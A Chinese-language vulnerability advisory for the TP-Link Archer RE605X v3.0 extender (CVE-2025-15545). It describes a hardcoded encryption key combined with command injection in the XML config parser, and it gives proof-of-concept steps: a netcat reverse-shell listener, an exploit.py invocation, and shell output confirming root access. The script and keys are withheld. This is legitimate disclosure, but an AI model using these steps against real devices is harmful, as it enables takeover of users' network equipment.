厂商: TP-Link
厂商网站: TP-Link
型号: Archer RE605X
硬件版本: RE605X v3.0
固件版本: RE605X(EU)_V3_1.1.5 Build 20240905
固件下载地址: TP-Link
一系列漏洞——包括使用硬编码的加密密钥以及 XML 配置解析器组件中的命令注入——使本地已认证攻击者能够以 root 身份在设备上实现远程代码执行(RCE)。
注意: exploit.py 概念验证演示了一个链式攻击场景,并依赖已认证用户的凭据作为额外的前提条件。此认证步骤不在 CVE-2025-15545 的覆盖范围内,仅用于演示目的。
在单独的终端上监听传入连接:
$ nc -lvnp 4444
执行 exploit.py 脚本:
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>
注意:aes_key 和 aes_iv 是设备用于配置文件加密和解密的硬编码加密密钥,此概念验证需要用到它们。出于安全问题,此处无法提供。
在第一个终端上接收反向 shell:
$ nc -lvnp 4444
Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt
这些漏洞由 Nicola Giuffrida 报告。